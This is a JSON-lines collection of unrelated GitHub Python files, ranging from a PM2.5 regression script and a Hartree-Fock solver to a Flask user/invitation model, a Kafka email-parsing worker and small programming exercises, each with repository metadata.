cross_val_score\r\ncv=cross_val_score(reg,X,y,cv=5,n_jobs=-1)\r\nprint(cv)\r\ncv_mean=cv.mean()\r\n\r\n#hyperparameter tuning\r\nn_estimators=[int(x) for x in np.linspace(start=100,stop=1200,num=12)]\r\nmax_depth=[int(x) for x in np.linspace(start=5,stop=30,num=6)]\r\nparameters={'n_estimators':n_estimators,'max_features':['auto','sqrt'],\r\n 'max_depth':max_depth,'min_samples_split':[2,5,10,15,20],'min_samples_leaf':[1,2,5,10]}\r\nfrom sklearn.model_selection import RandomizedSearchCV\r\nrandom_search=RandomizedSearchCV(reg,param_distributions=parameters,n_iter=100,scoring='neg_mean_squared_error',cv=5,verbose=2)\r\nrandom_search.fit(X_train,y_train)\r\n\r\nrandom_search.best_params_\r\nrandom_search.best_score_\r\n\r\npred=random_search.predict(X_test)\r\n#plotting\r\nsb.distplot(y_test-pred)\r\n\r\n#regression evaluation metrics\r\nimport sklearn.metrics as mt\r\nprint('RMSE:',np.sqrt(mt.mean_absolute_error(y_test,pred)))\r\n\r\nimport pickle\r\nfile=open('randomforest_model.pkl','wb')\r\npickle.dump(random_search,file)\r\n\r\n#for sinagle day\r\nrandom_search.predict([[24.7 , 29.9 , 20.5 , 1018.5 , 65.0 , 6.9 , 8.0 , 14.8]])\r\n","repo_name":"GovindDogra/PM2.5_Predictor","sub_path":"PM2.5 prediction/ramdom_forest_reg.py","file_name":"ramdom_forest_reg.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72980252641","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('inmuebles', '0007_inmuebles_logo'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='inmuebles',\n name='slug',\n 
field=models.CharField(default=b'', max_length=100, blank=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"javierpedrozaing/inmobiliaria","sub_path":"inmuebles/migrations/0008_inmuebles_slug.py","file_name":"0008_inmuebles_slug.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32670428062","text":"from pyscf.gto import Mole\nfrom scipy.linalg import eigh, fractional_matrix_power\nfrom util import atoms\nfrom typing import Tuple, List\nimport math\nimport numpy as np\n\n\nclass HartreeFockEngine():\n def __init__(self, molecule: List[Tuple[int, float, float, float]], charge: int, basis: str, unit: str) -> None:\n # PYSCF Molecule\n self.mol: Mole = atoms.getPYSCFMolecule(molecule, charge, basis, unit)\n self.n_electrons: int = self.mol.tot_electrons()\n\n # Energies and Integrals\n self.nuc_energy = HartreeFockEngine.calculateNuclearRepulsionEnergy(\n molecule)\n self.overlap_integrals = self.mol.intor('int1e_ovlp')\n self.kinetic_integrals = self.mol.intor('int1e_kin')\n self.nuclear_integrals = self.mol.intor('int1e_nuc')\n self.two_e_integrals = self.mol.intor('int2e')\n\n # Hamiltonian\n self.core_hamiltonian = self.kinetic_integrals + self.nuclear_integrals\n\n # Orthogonalizing Matrix\n self.ortho_mat = fractional_matrix_power(self.overlap_integrals, -1/2)\n\n # Program Outputs\n self.energy: float = 0\n self.density_mat: np.ndarray = np.zeros((self.mol.nao, self.mol.nao))\n self.cycles: int = 0\n self.converged: bool = False\n\n def calculateDensity(self, fock_mat: np.ndarray) -> np.ndarray:\n # Transform Fock matrix to orthonormal basis:\n fock_ortho = (self.ortho_mat.conj().T) @ fock_mat @ self.ortho_mat\n # Diagonalize Fock matrix\n _, coeff_ortho = eigh(fock_ortho)\n # Construct eigenvector matrix to get the orbital coefficients\n coeff_mat = self.ortho_mat @ coeff_ortho\n # Form density matrix\n density_mat = 2 * \\\n coeff_mat[:, :(self.n_electrons//2)] @ coeff_mat[:,\n :(self.n_electrons//2)].T\n return density_mat\n\n def calculateFock(self, density_mat: np.ndarray) -> np.ndarray:\n fock_mat = np.empty((self.mol.nao, self.mol.nao))\n for u in range(fock_mat.shape[0]):\n for v in range(fock_mat.shape[1]):\n # F_uv = H_uv + Coulomb Integral - 1/2 * Exchange Integral\n coulomb = (self.two_e_integrals[u, v] * density_mat).sum()\n exchange = (self.two_e_integrals[u, :, v] * density_mat).sum()\n fock_mat[u, v] = self.core_hamiltonian[u, v] + \\\n coulomb - (0.5 * exchange)\n return fock_mat\n\n def calculateEnergy(self, density_mat: np.ndarray) -> float:\n fock_mat = self.calculateFock(density_mat)\n # Energy = Sum over uv: D_uv (H_uv + F_uv) + E_nuc\n total_energy = self.nuc_energy + \\\n (0.5 * density_mat * (fock_mat + self.core_hamiltonian)).sum()\n return total_energy\n\n def calculateNuclearRepulsionEnergy(molecule: List[Tuple[int, float, float, float]]) -> float:\n nuc: float = 0\n for A in range(len(molecule) - 1):\n for B in range(A + 1, len(molecule)):\n dx = (molecule[A][1] - molecule[B][1])\n dy = (molecule[A][2] - molecule[B][2])\n dz = (molecule[A][3] - molecule[B][3])\n nuc += (molecule[A][0] * molecule[B][0]) / \\\n math.sqrt(dx ** 2 + dy ** 2 + dz ** 2)\n return nuc\n\n def converge(self, density_guess: np.ndarray = None, max_iterations: int = 64, energy_threshold: float = 1e-10, density_threshold: float = 1e-6) -> float:\n # Initial density is the guess, initial energy is 0\n density_mat = np.zeros((self.mol.nao, self.mol.nao)\n ) if density_guess is 
None else density_guess\n total_energy = 0\n\n # First Cycle: calculate new fock matrix from density, new density from fock matrix\n fock_mat = self.calculateFock(density_mat)\n new_density = self.calculateDensity(fock_mat)\n new_energy = self.calculateEnergy(new_density)\n\n # Differences: calculate the change in energy and density\n delta_energy = new_energy - total_energy\n delta_density = math.sqrt(\n np.square(np.subtract(new_density, density_mat)).mean())\n\n # Cycles\n iterations = 1\n for i in range(max_iterations):\n # Check for convergence (both change in energy and density below thresholds)\n if delta_energy < energy_threshold and delta_density < density_threshold:\n total_energy = new_energy\n density_mat = new_density\n break\n # Hasn't converged; generate new fock matrix and new density matrix\n fock_mat = self.calculateFock(new_density)\n new_density = self.calculateDensity(fock_mat)\n new_energy = self.calculateEnergy(new_density)\n # Diffs\n delta_energy = new_energy - total_energy\n delta_density = math.sqrt(\n np.square(np.subtract(new_density, density_mat).real).mean())\n # Keep track of iterations\n iterations += 1\n # Update energy and density\n total_energy = new_energy\n density_mat = new_density\n # store results\n self.energy = total_energy\n self.density_mat = density_mat\n self.cycles = iterations\n self.converged = (\n delta_energy < energy_threshold and delta_density < density_threshold)\n\n return self.energy\n\n\ndef calculateHFEnergy(mol: List[Tuple[int, float, float, float]], charge: int = 0, basis: str = 'sto-3g', unit: str = 'bohr') -> Tuple[float, np.ndarray, bool, int]:\n \"\"\"\n mol = [(8, 0.000000000000, -0.143225816552, 0.000000000000), \n (1, 1.638036840407, 1.136548822547, -0.000000000000), \n (1, -1.638036840407, 1.136548822547, -0.000000000000)]\n \"\"\"\n hf = HartreeFockEngine(mol, charge, basis, unit)\n hf.converge(density_threshold=1e-8, max_iterations=50)\n return (hf.energy, hf.density_mat, hf.converged, hf.cycles)\n","repo_name":"chrisrollsdice/MolGeo","sub_path":"energy/hartreefock.py","file_name":"hartreefock.py","file_ext":"py","file_size_in_byte":5987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37161861812","text":"import torch\n\ndef batchify_rays(render_fn, rays_flat, chunk=1024 * 32):\n\n \"\"\" Render rays in smaller minibatches to avoid OOM \"\"\"\n\n all_ret = {}\n for i in range(0, rays_flat.shape[0], chunk):\n ret = render_fn(rays_flat[i:i + chunk])\n for k in ret:\n if k not in all_ret:\n all_ret[k] = []\n all_ret[k].append(ret[k])\n\n all_ret = {k: torch.cat(all_ret[k], 0) for k in all_ret}\n return all_ret\n\n\ndef batchify(fn, chunk):\n\n \"\"\" Constructs a version of 'fn' that applies to smaller batches \"\"\"\n\n if chunk is None:\n return fn\n\n def ret(inputs):\n return torch.cat([fn(inputs[i:i + chunk]) for i in range(0, inputs.shape[0], chunk)], 0)\n\n return ret","repo_name":"dmjovan/PSIML8-NeRF","sub_path":"nerf/training/training_utils.py","file_name":"training_utils.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39665598147","text":"def transformaEmFloat(lista):\n lista[1]=lista[1].replace(',' , '.')\n lista[1]=float(lista[1])\n return lista\ndef corrigeData(lista):\n for i in range(len(lista)):\n data = lista[i]\n ano = data[:4]\n mes = data[5:]\n lista[i] = mes + \"-\" + ano\n return lista\ndef maiorEMenor(lista):\n 
menor_elemento=lista[0]\n maior_elemento=lista[0]\n for elemento in lista:\n if(elementomaior_elemento):\n maior_elemento=elemento\n indiceMenor=lista.index(menor_elemento)\n indiceMaior=lista.index(maior_elemento)\n return menor_elemento,maior_elemento,indiceMenor,indiceMaior\ndatas=[]\nipcas=[]\ndatas_ipcas=[]\nwhile True:\n data_ipca=input()\n if data_ipca==\"*\":\n break\n datas_ipcas=data_ipca.split(\" \")\n transformaEmFloat(datas_ipcas)\n datas.append(datas_ipcas[0])\n ipcas.append(datas_ipcas[1])\ndatasCorrigidas=corrigeData(datas)\nmenor_e_maior=maiorEMenor(ipcas)\nmenorIpca,maiorIpca,indiceMenor,indiceMaior=menor_e_maior\nprint(f\"Menor: {menorIpca} ({datas[indiceMenor]})\")\nprint(f\"Maior: {maiorIpca} ({datas[indiceMaior]})\")\nmediaIpcas=sum(ipcas)/len(ipcas)\nprint(f\"Media: {mediaIpcas:.2f}\")","repo_name":"AurinoMSMF/Exercicios","sub_path":"TheHuxley/15-Exercicio_Rev(3990).py","file_name":"15-Exercicio_Rev(3990).py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19942746734","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Database model definitions.\"\"\"\n\nimport datetime\nimport time\nfrom typing import Optional\n\nimport sqlalchemy\nfrom flask_login import UserMixin\nfrom passlib.pwd import genword\n\nfrom . import db, user_hasher\n\n\nclass Invitation(db.Model):\n \"\"\"User invitation.\n\n Attributes:\n id (int): ID of the invitation.\n owner_id (int): ID of the owner of the invite.\n user_id (int): ID of the user that signed up using this invite.\n token (str): Token used to signup.\n expiration (datetime): Date at which the invitation is no longer valid.\n \"\"\"\n __tablename__ = 'invitations'\n\n id = db.Column(db.Integer, primary_key=True)\n owner_id = db.Column(\n db.Integer,\n db.ForeignKey(\n 'users.id',\n name='fk_invitation_users_owner',\n onupdate='CASCADE',\n ondelete='CASCADE'\n ),\n nullable=False\n )\n user_id = db.Column(\n db.Integer,\n db.ForeignKey(\n 'users.id',\n name='fk_invitation_users_user',\n onupdate='CASCADE',\n ondelete='CASCADE'\n ),\n nullable=True\n )\n token = db.Column(\n db.String(64),\n nullable=False,\n default=genword(length=64),\n unique=True\n )\n expiration = db.Column(\n db.DateTime,\n nullable=False,\n default=datetime.datetime.utcnow()+datetime.timedelta(weeks=1),\n # If the server supports it:\n # server_default=sqlalchemy.sql.expression.text('NOW() + INTERVAL \\'1 week\\'')\n )\n\n # Relationships\n owner = db.relationship(\n 'User',\n primaryjoin=('Invitation.owner_id == User.id')\n )\n\n user = db.relationship(\n 'User',\n primaryjoin=('Invitation.user_id == User.id')\n )\n\n @classmethod\n def get_by_token(cls, token: str) -> Optional['Invitation']:\n \"\"\"Obtain an already existing invitation by token.\n\n Args:\n token (str): Token of the invitation.\n\n Returns:\n Invitation instance or `None` if not found.\n \"\"\"\n return cls.query.filter_by(token=token).first()\n\n @classmethod\n def generate_token(cls) -> str:\n \"\"\"Generate a random token for the invitation.\n\n Returns:\n Random token.\n \"\"\"\n return genword(length=64)\n\n\nclass User(db.Model, UserMixin):\n \"\"\"User definition.\n\n Attributes:\n id (int): User ID.\n username (str): Username, must be unique.\n password (str): Encrypted password.\n email (str): Email of the user, must be unique.\n is_active (bool): Whether the user is active (can login).\n locale (str): Locale code.\n timezone (str): Timezone used to localize dates.\n invitations (int): 
Remaining invitations for this user.\n serial (str): Serial for sessions.\n joined_at (datetime): Date at which the user joined.\n password_reset_token (str): Unique token used to reset the password.\n password_reset_expiration (datetime): Date at which the password reset\n token expires.\n \"\"\"\n __tablename__ = 'users'\n\n id = db.Column(db.Integer, primary_key=True)\n\n # Authentication\n username = db.Column(db.String(50), nullable=False, unique=True)\n password = db.Column(db.String(255), nullable=False, default='')\n email = db.Column(db.String(255), nullable=False, unique=True)\n is_active = db.Column(db.Boolean, nullable=False,\n default=False, server_default='f')\n\n # Additional attributes\n locale = db.Column(db.String(2), nullable=False,\n default='en', server_default='en')\n timezone = db.Column(db.String(50), nullable=False,\n default='UTC', server_default='UTC')\n invitations = db.Column(db.Integer, nullable=False,\n default=10, server_default='10')\n serial = db.Column(db.Text, nullable=False,\n default=lambda: User.generate_serial())\n\n joined_at = db.Column(db.DateTime, nullable=False,\n default=datetime.datetime.utcnow(),\n server_default=sqlalchemy.sql.func.now())\n password_reset_token = db.Column(db.String(100), nullable=True, unique=True)\n password_reset_expiration = db.Column(db.DateTime, nullable=True)\n\n @property\n def hashid(self) -> str:\n \"\"\"Calculate the Hashid from user ID.\"\"\"\n return user_hasher.encode(self.id)\n\n @staticmethod\n def generate_serial(length: int = 5) -> str:\n \"\"\"Generate a valid session serial.\n\n A serial is comprised of the current timestamp and N random characters.\n\n Args:\n length (int): Length for the random string appended to the timestamp.\n\n Returns:\n Serial string.\n \"\"\"\n return '{}{}'.format(int(time.time()), genword(length=length))\n\n @classmethod\n def get_by_username(cls, username: str) -> Optional['User']:\n \"\"\"Obtain an already existing user by username.\n\n Args:\n username (str): Unique username of the user\n\n Returns:\n User instance or None if not found.\n \"\"\"\n return cls.query.filter_by(username=username).first()\n\n @classmethod\n def get_by_email(cls, email: str) -> Optional['User']:\n \"\"\"Obtain an already existing user by email.\n\n Args:\n email (str): Unique email of the user\n\n Returns:\n User instance or None if not found.\n \"\"\"\n return cls.query.filter_by(email=email).first()\n\n def get_id(self) -> str:\n \"\"\"Return the ID to use for the login manager.\n\n This is generated by concatenating the numerical ID and the serial\n in order to allow invalidating user sessions on certain scenarios\n such as password change.\n\n Returns:\n ID to use for session tokens.\n \"\"\"\n return '{}_{}'.format(self.id, self.serial)\n","repo_name":"rmed/flask-modern-template","sub_path":"app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"36455610450","text":"'''\nDetect Loop\nGiven a head pointer to the linked list, check if the linked list has loop or not. If it has loop, function should return 1, else it should return 0.\n\nNote:\nThis is a functional problem, so you don't need to worry about the input and output format. 
Simply take care of the detectLoop function.\n\nExample & Explanation:\nSuppose, given Linked List is:\n\n76 -> 66 -> 11 -> 73 -> 77 \n ^ |\n |_________________| \nThen, the output should be:\n\n1\nBecause, the given linked list consists of a loop!\n\n'''\n# Python program to detect loop in the linked list \n\n# Node class \nclass Node: \n\n\t# Constructor to initialize the node object \n\tdef __init__(self, data): \n\t\tself.data = data \n\t\tself.next = None\n\nclass LinkedList:\n# Function to initialize head \n def __init__(self): \n self.head = None\n\n# Do not change anything above this line\n\n def detectLoop(self):\n # YOU ONLY NEED TO COMPLETE THIS FUNCTION.\n # RETURN 1 IF LOOP IS THERE IN THE LINKED LIST, ELSE RETURN 0\n temp=self.head\n f=temp.next\n s=temp.next.next\n while s!=None: \n if f==s:\n return 1\n f=f.next\n s=s.next.next\n return 0\n\n\n# Do not change anything below this line\nif __name__ == '__main__':\n \n n = int(input())\n\n # Start with the empty list \n llist = LinkedList() \n\n temp = [int(x) for x in input().split()]\n\n if(n<1):\n llist.head = None\n elif(n<2):\n llist.head = Node(temp[0])\n else:\n llist.head = Node(temp[0])\n second = Node(temp[1])\n llist.head.next = second\n curr = llist.head.next\n\n\n for i in range(2,n):\n t = Node(temp[i])\n curr.next = t\n curr = curr.next\n\n link = int(input())\n if(link!=-1):\n t = llist.head\n for _ in range(link-1):\n t = t.next\n curr.next = t\n\n # llist.printList()\n print(llist.detectLoop())","repo_name":"iamnishantchandra/DSA-QA-Using-Python","sub_path":"10X/Python/Sorting/Detect Loop link list.py","file_name":"Detect Loop link list.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"72856800802","text":"from concurrent import futures\nfrom confluent_kafka import Consumer, Producer, OFFSET_BEGINNING\nimport logger\nimport json\nfrom typing import List\nimport asyncio\nimport threading\nimport os\nfrom threading import Thread\nimport time\nfrom gen_parse import aget_parse_results\n\n\nKAFKA_CONFIG = {\n \"bootstrap.servers\": \"kafka:29092\",\n \"group.id\": \"parse\",\n \"auto.offset.reset\": \"earliest\",\n}\nMAX_WORKERS = 10\nMAX_CONCURRENT_REQUESTS_PER_WORKER = 10\n\n\nclass RetryCounter:\n def __init__(\n self,\n producer: Producer,\n max_retries: int = 5,\n *args,\n **kwargs,\n ):\n self.producer = producer\n self.retries = max_retries\n self.id = kwargs.get(\"taskid\", -1)\n\n def __call__(self, err, msg):\n if err is not None:\n logger.warning(f\"Error when producing message to topic: {err}\")\n self.retries -= 1\n if self.retries > 0:\n self.producer.produce(\n msg.topic(),\n key=msg.key().decode(\"utf-8\"),\n value=msg.value().decode(\"utf-8\"),\n on_delivery=self,\n )\n logger.info(f\"Retry producing message to topic: {msg.topic()}\")\n else:\n logger.error(f\"Failed to produce message to topic: {msg.topic()}\")\n self.producer.produce(\n \"errors\",\n key=\"error\",\n value=json.dumps(\n {\n \"key\": msg.key().decode(\"utf-8\"),\n \"msg\": msg.value().decode(\"utf-8\"),\n \"error\": f\"fail to produce message to topic: {msg.topic()}\",\n \"description\": str(err),\n }\n ),\n )\n else:\n email = json.loads(msg.value().decode(\"utf-8\"))\n logger.info(\n f\"[{self.id}]: Successfully produced email (id = {email['email_id']}, address = {email['address']}) to topic: {msg.topic()}\"\n )\n\n\nasync def req_retry_handler(\n email: dict,\n producer: Producer,\n max_retries=3,\n sem: 
asyncio.BoundedSemaphore = None,\n taskid=None,\n):\n retries = max_retries\n err_str = \"\"\n logger.info(\n f\"Parsing events for email: email_id = {email['email_id']}, address = {email['address']}\"\n )\n while retries > 0:\n try:\n events = await aget_parse_results(email[\"item\"], max_retries, semaphore=sem)\n for event in events[\"events\"]:\n item = {\n \"user_id\": email[\"user_id\"],\n \"email_id\": email[\"email_id\"],\n \"address\": email[\"address\"],\n \"event\": event,\n }\n producer.produce(\n \"events\",\n key=\"event\",\n value=json.dumps(item),\n on_delivery=RetryCounter(producer, max_retries, taskid=taskid),\n )\n return\n except Exception as e:\n retries -= 1\n err_str = str(e)\n logger.error(\n \"Error retriving emails for request: {}, retrying in 1s ...\".format(\n err_str\n )\n )\n await asyncio.sleep(1)\n\n producer.produce(\n \"errors\",\n key=\"error\",\n value=json.dumps({\"email\": email, \"error\": err_str}),\n )\n\n\ndef task_func(\n emails: List[str],\n producer: Producer,\n max_retries=3,\n):\n logger.info(\n f\"start processing {len(emails)} emails with thread id {threading.get_ident()}, process id {os.getpid()} ...\"\n )\n try:\n emails = [json.loads(req_msg.value()) for req_msg in emails]\n # print(json.dumps(reqs, indent=2))\n sem = asyncio.BoundedSemaphore(MAX_CONCURRENT_REQUESTS_PER_WORKER)\n tasks = [\n req_retry_handler(email, producer, max_retries, sem, i)\n for i, email in enumerate(emails)\n ]\n loop = asyncio.get_event_loop()\n loop.run_until_complete(asyncio.gather(*tasks))\n logger.info(f\"Finished parsing {len(emails)} emails\")\n except Exception as e:\n logger.error(\"Error parsing emails: {}\".format(str(e)))\n logger.warning(\"requests: {}\".format([r.value() for r in emails]))\n raise e\n\n\ndef serve():\n logger.info(\n f\"start running async server at thread id {threading.get_ident()}, process id {os.getpid()} ...\"\n )\n\n consumer = Consumer(KAFKA_CONFIG)\n consumer.subscribe([\"new_emails\"])\n producer = Producer(KAFKA_CONFIG)\n\n def producer_periodic_poll():\n while True:\n producer.poll(0.5)\n time.sleep(0.5)\n\n p_thread = Thread(target=producer_periodic_poll, daemon=True)\n p_thread.start()\n\n def worker_init():\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n logger.debug(f\"worker thread id {threading.get_ident()} initialized ...\")\n\n logger.info(\"Start consuming messages ...\")\n\n with futures.ThreadPoolExecutor(\n max_workers=MAX_WORKERS, initializer=worker_init\n ) as executor:\n while True:\n reqs = consumer.consume(\n num_messages=MAX_CONCURRENT_REQUESTS_PER_WORKER, timeout=1.0\n )\n if len(reqs) == 0:\n continue\n logger.info(\"Received {} requests\".format(len(reqs)))\n executor.submit(task_func, reqs, producer, 5)\n logger.info(\"Sent {} requests to executor\".format(len(reqs)))\n\n\nif __name__ == \"__main__\":\n logger.logger_init(\n log_dir=\"log\", name=\"parse-async\", level=\"INFO\", when=\"D\", backupCount=7\n )\n serve()\n","repo_name":"dongmingli-Ben/email-wizard","sub_path":"smart_parse/parse_server_async.py","file_name":"parse_server_async.py","file_ext":"py","file_size_in_byte":5748,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"1225874811","text":"import functools\nimport json\nimport pathlib\nimport typing\n\nimport clize\nfrom tomlkit import parse\n\n\n\"\"\"\nexample test spec:\n\n[datalens.pytest.unit]\nroot_dir = \"dl_core_tests/\"\ntarget_path = \"unit\"\n\n[datalens.pytest.db_part_1]\nroot_dir = 
\"dl_core_tests/db/\"\ntarget_path = \"aio caches capabilities common\"\nlabels = [\"fat\"]\n\"\"\"\n\nDEFAULT_MODE = \"base\"\n\n\ndef format_output(name: str, sections: list[tuple[str, str]]) -> str:\n data = [f\"{path}:{target}\" for path, target in sections]\n\n return f\"{name}={json.dumps(data)}\"\n\n\ndef read_package_paths(targets_path: pathlib.Path) -> typing.Generator[str, None, None]:\n with open(targets_path, \"r\") as file:\n data = file.read()\n data = data.strip()\n data = data.replace(\"'\", '\"')\n\n for item in json.loads(data):\n yield item.strip()\n\n\ndef read_pytest_targets(path: pathlib.Path) -> typing.Optional[dict[str, typing.Any]]:\n if not path.is_file():\n print(f\"File {path} not found\")\n raise FileNotFoundError(f\"File {path} not found\")\n\n with open(path, \"r\") as file:\n toml_data = parse(file.read())\n\n return toml_data.get(\"datalens\", {}).get(\"pytest\", {})\n\n\ndef get_package_tests(\n root_path: pathlib.Path,\n package_path: str,\n requested_mode: str,\n) -> typing.Generator[tuple[str, str], None, None]:\n pytest_targets: dict | None = {}\n try:\n pytest_targets = read_pytest_targets(root_path / package_path / \"pyproject.toml\")\n except FileNotFoundError:\n return\n\n if pytest_targets is None:\n return\n\n for section in pytest_targets.keys():\n spec = pytest_targets.get(section, {})\n labels = spec.get(\"labels\", [])\n\n if requested_mode in labels:\n yield package_path, section\n\n\ndef get_default_package_tests(\n root_path: pathlib.Path,\n package_path: str,\n) -> typing.Generator[tuple[str, str], None, None]:\n pytest_targets: dict | None = {}\n try:\n pytest_targets = read_pytest_targets(root_path / package_path / \"pyproject.toml\")\n except FileNotFoundError:\n return\n\n if not pytest_targets or len(pytest_targets) == 0:\n yield package_path, \"__default__\"\n return\n\n for section, spec in pytest_targets.items():\n labels = spec.get(\"labels\", [])\n\n if len(labels) == 0:\n yield package_path, section\n\n\ndef get_tests(\n requested_mode: str,\n root_dir: pathlib.Path,\n test_targets_json_path: pathlib.Path,\n) -> typing.Generator[tuple[str, str], None, None]:\n for package_path in read_package_paths(test_targets_json_path):\n if requested_mode == DEFAULT_MODE:\n yield from get_default_package_tests(root_dir, package_path)\n else:\n yield from get_package_tests(root_dir, package_path, requested_mode)\n\n\ndef split_tests(\n requested_mode: str,\n root_dir: pathlib.Path,\n test_targets_json_path: pathlib.Path,\n) -> None:\n result = list(get_tests(requested_mode, root_dir, test_targets_json_path))\n formatted_output = format_output(f\"split_{requested_mode}\", result)\n print(formatted_output)\n\n\ncmd = functools.partial(clize.run, split_tests)\n\nif __name__ == \"__main__\":\n cmd()\n","repo_name":"datalens-tech/datalens-backend","sub_path":"terrarium/bi_ci/bi_ci/split_pytest_tasks.py","file_name":"split_pytest_tasks.py","file_ext":"py","file_size_in_byte":3173,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"54"} +{"seq_id":"31116969073","text":"#! 
/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Input line num\nnum = int(input())\n# Input rates\nrates = [int(input()) for i in range(num)]\n\nmaxv = -100000000000\nminv = 100000000000\n\nfor i in range(len(rates)):\n maxv = max(maxv, rates[i] - minv)\n minv = min(minv, rates[i])\n\nprint(maxv)\n","repo_name":"daylight55/learn-program-contest","sub_path":"2_Algorithm_and_Order/ALDS1_1_D.py","file_name":"ALDS1_1_D.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9967782883","text":"from django import forms\n\nclass FormularioEmpleados(forms.Form):\n\n CARGO=(\n (1,'Lava Platos'),\n (2,'Chef'),\n (3,'Mesero')\n )\n\n nombre=forms.CharField(\n required=True,\n max_length=20,\n label='Nombre del Empleado ',\n widget=forms.TextInput(attrs={'class':'form-control mb-3'})\n )\n apellido=forms.CharField(\n required=False,\n max_length=20,\n widget=forms.TextInput(attrs={'class':'form-control mb-3'})\n )\n telefono=forms.CharField(\n required=True,\n max_length=20,\n widget=forms.NumberInput(attrs={'class':'form-control mb-3'})\n )\n direccion=forms.CharField(\n required=False,\n max_length=20,\n widget=forms.TextInput(attrs={'class':'form-control mb-3'})\n )\n cargo=forms.ChoiceField(\n required=True,\n widget=forms.Select(attrs={'class':'form-select mb-3'}),\n choices=CARGO\n )","repo_name":"alejo1403/trabajo-final","sub_path":"config/web/formularios/formularioEmpleados.py","file_name":"formularioEmpleados.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5347880039","text":"import numpy as np\n\n\ndef dilated_healpix_map(m):\n \"\"\"\n Dilate a healpix map - every pixel with a neighbour\n that is UNSEEN gets set to unseen as well\n\n Parameters\n ----------\n m: array\n Healpix float map\n\n Returns\n -------\n m2: array\n Matching-sized map with edge pixels UNSEEN\n \"\"\"\n import healpy\n\n npix = m.size\n nside = healpy.npix2nside(npix)\n hit = np.where(m != healpy.UNSEEN)[0]\n neighbours = healpy.get_all_neighbours(nside, hit)\n\n bad = np.any(m[neighbours] == healpy.UNSEEN, axis=0)\n bad_index = hit[bad]\n\n m2 = m.copy()\n m2[bad_index] = healpy.UNSEEN\n return m2\n","repo_name":"LSSTDESC/TXPipe","sub_path":"txpipe/utils/healpix.py","file_name":"healpix.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"54"} +{"seq_id":"36316739131","text":"import threading\nimport time\nclass Sense:\n def __init__(self,BrainP):\n self.bparm = BrainP\n tSense = threading.Thread(target=self.loopSense)\n tSense.start()\n\n def loopSense(self):\n self.bparm.logSenseThread(\"thread started...\")\n last_time = time.clock()\n diffs = []\n while self.bparm.senseLife:\n #register iterations per second\n last_time, diffs, ips = self.bparm.ips(last_time, diffs);\n self.bparm.nimage = ips\n #self.bparm.logSenseThread(\"transmiting...\")\n self.bparm.sight.see()\n #time.sleep(0.5)\n\n","repo_name":"tizon9804/NNRobot","sub_path":"NNRobotUSup/Brain/TSense.py","file_name":"TSense.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28000539571","text":"tickets = [[\"ICN\", \"SFO\"], [\"ICN\", \"ATL\"], [\"SFO\", \"ATL\"], [\"ATL\", \"ICN\"], [\"ATL\", \"SFO\"]]\n# [['ICN', 'A'], ['A', 'B'], ['A', 'C'], ['C', 'A'], ['B', 
'D']]\ndef solution(tickets):\n answer = []\n visited = [False for j in range(len(tickets))]\n\n def dfs(start, result):\n if False not in visited:\n answer.append(result)\n return\n\n for i, ticket in enumerate(tickets):\n if not visited[i] and start == ticket[0]:\n visited[i] = True\n dfs(ticket[1], result + [ticket[1]])\n visited[i] = False\n\n dfs('ICN', ['ICN'])\n\n return sorted(answer)[0]\n\n\nprint(solution(tickets))\n","repo_name":"yxnxj/Algorithms","sub_path":"Programmers/lv3_여행경로/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38454258864","text":"'''\nCreate data structures.\n~~~~~~~~~~~~~~~~~~~~~~~\n'''\n\n# Import libraries\nimport asyncio\nimport discord\n\nfrom src.core import constants\n\n# Initialize central dict structures to hold:\n## memory queues\nlibrary = {}\n## token counts\ncounter = {}\n## channel locks (for thread safety)\nlocker = {}\n\n'''\nQueue/Counter Creation\n'''\n\nasync def fetch_queue(message: discord.message) -> asyncio.Queue:\n \"\"\"\n Fetch status of message channel's queue in library.\n\n If exists -> return queue.\n Else -> create and return queue.\n \"\"\"\n\n if message.channel.id not in library:\n library[message.channel.id] = asyncio.Queue() \n \n return library[message.channel.id]\n\nasync def fetch_counter(message: discord.message) -> int:\n \"\"\"\n Fetch status of message channel's token counter.\n\n If exists -> return count.\n Else -> create counter and return count.\n \"\"\"\n\n if message.channel.id not in counter:\n counter[message.channel.id] = 0 \n \n return counter[message.channel.id]\n\n'''\nLock Creation\n'''\nasync def fetch_lock(message: discord.message) -> asyncio.Lock:\n \"\"\"\n 